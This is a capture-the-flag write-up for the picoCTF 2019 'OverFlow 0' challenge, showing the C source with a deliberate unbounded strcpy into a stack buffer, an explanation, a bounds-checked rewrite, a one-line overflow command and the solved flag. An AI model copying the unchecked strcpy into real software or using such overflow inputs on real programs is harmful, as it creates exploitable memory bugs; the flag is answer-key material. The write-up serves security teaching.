picoCTF 2019 - OverFlow 0 writeup
Description
This should be easy. Overflow the correct buffer in this program and get a flag.
Category: Binary Exploitation
Points: 100
Source Code
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <signal.h>
#include <unistd.h>      /* getegid, setresgid */
#include <sys/types.h>   /* gid_t */

#define FLAGSIZE_MAX 64

char flag[FLAGSIZE_MAX];

/* Runs on SIGSEGV: prints the flag and exits. */
void sigsegv_handler(int sig) {
    fprintf(stderr, "%s\n", flag);
    fflush(stderr);
    exit(1);
}

/* Unbounded strcpy into a 128-byte stack buffer: the intended bug. */
void vuln(char *input){
    char buf[128];
    strcpy(buf, input);
}

int main(int argc, char **argv){
    FILE *f = fopen("flag.txt","r");
    if (f == NULL) {
        printf("Flag File is Missing. Problem is Misconfigured, please contact an Admin if you are running this on the shell server.\n");
        exit(0);
    }
    fgets(flag,FLAGSIZE_MAX,f);
    signal(SIGSEGV, sigsegv_handler);
    gid_t gid = getegid();
    setresgid(gid, gid, gid);
    if (argc > 1) {
        vuln(argv[1]);
        printf("You entered: %s", argv[1]);
    }
    else
        printf("Please enter an argument next time\n");
    return 0;
}
Explanation
The contents of flag.txt are read with fgets (at most FLAGSIZE_MAX - 1 bytes) into a global buffer named flag. Next, a signal handler is installed to catch segmentation faults (SIGSEGV). If the handler is triggered, it prints the flag to stderr and exits.
Plan
User input is taken from argv[1] and copied with strcpy into a 128-byte stack buffer. Since no bounds checking is done, passing more than 128 bytes overflows the buffer and overwrites the saved frame data, so vuln() segfaults when it returns; the SIGSEGV handler then prints the flag.
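As an added illustration (not part of the challenge source or this writeup), here is the unchecked copy beside a bounds-checked replacement; vuln_unsafe, vuln_checked and BUFSIZE are names I chose for the example.

```c
#include <stdio.h>
#include <string.h>

#define BUFSIZE 128

/* As in the challenge: strcpy() copies until it finds input's NUL byte,
 * so an argument of BUFSIZE bytes or more writes past the end of buf,
 * over the saved frame pointer and return address, and vuln() crashes
 * when it returns. Defined for comparison only; never called below. */
void vuln_unsafe(const char *input) {
    char buf[BUFSIZE];
    strcpy(buf, input);
    (void)buf;
}

/* Hardened form (hypothetical name): look for the terminator within the
 * first BUFSIZE bytes of input; if none is found the string cannot fit,
 * so refuse it instead of copying. Returns the length copied, or -1. */
int vuln_checked(const char *input) {
    char buf[BUFSIZE];
    const char *nul = memchr(input, '\0', BUFSIZE);
    if (nul == NULL) {
        return -1;               /* >= BUFSIZE bytes: would overflow */
    }
    size_t len = (size_t)(nul - input);
    memcpy(buf, input, len + 1); /* +1 carries the NUL terminator */
    (void)buf;
    return (int)len;
}

int main(void) {
    /* Constructed input: the writeup's 140 'A's, plus a short string. */
    char big[141];
    memset(big, 'A', 140);
    big[140] = '\0';
    printf("140 A's  -> %d\n", vuln_checked(big));      /* -1: rejected */
    printf("\"hello\" -> %d\n", vuln_checked("hello"));  /* 5 */
    return 0;
}
```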
Exploit
I used Python to pass 140 A’s to the vuln program:
$ ./vuln $(python -c "print 'A' * 140")
picoCTF{3asY_P3a5yd2b59a57}